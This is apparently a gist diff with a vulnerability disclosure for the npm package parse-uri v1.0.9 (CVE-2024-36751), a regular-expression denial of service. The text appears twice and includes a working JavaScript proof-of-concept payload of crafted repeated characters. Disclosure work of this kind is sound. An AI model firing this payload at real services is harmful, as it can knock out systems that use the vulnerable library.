6en6ar · January 15, 2025 12:21
diff --git a/gistfile1.txt b/gistfile1.txt
 Product:  https://www.npmjs.com/package/parse-uri
 Version: v1.0.9
 Vulnerability type: Denial of Service
 CVE ID: CVE-2024-36751

 Description: There is a possible Denial of service when repeating characters are added to a url being parsed. 
 It seems that the regex for checking the url on line 28. and 29. in index.jsis vulnerable to regex denial of service;

 Github issue: https://github.com/Kikobeats/parse-uri/issues/14

 PoC: 
 const parseUri = require('parse-uri')

 console.time('[ + ] Time passed -> ');
 payload = 'https://0' + '@/@.44'.repeat(45502) + '\x00.'.repeat(45502)
 parseUri(payload)
 //parseUri('https://google.com')
 console.timeEnd('[ + ] Time passed -> ');
	Product: https://www.npmjs.com/package/parse-uri
	Version: v1.0.9
	Vulnerability type: Denial of Service
	CVE ID: CVE-2024-36751

	Description: There is a possible Denial of service when repeating characters are added to a url being parsed.
	It seems that the regex for checking the url on line 28. and 29. in index.jsis vulnerable to regex denial of service;

	Github issue: https://github.com/Kikobeats/parse-uri/issues/14

	PoC:
	const parseUri = require('parse-uri')

	console.time('[ + ] Time passed -> ');
	payload = 'https://0' + '@/@.44'.repeat(45502) + '\x00.'.repeat(45502)
	parseUri(payload)
	//parseUri('https://google.com')
	console.timeEnd('[ + ] Time passed -> ');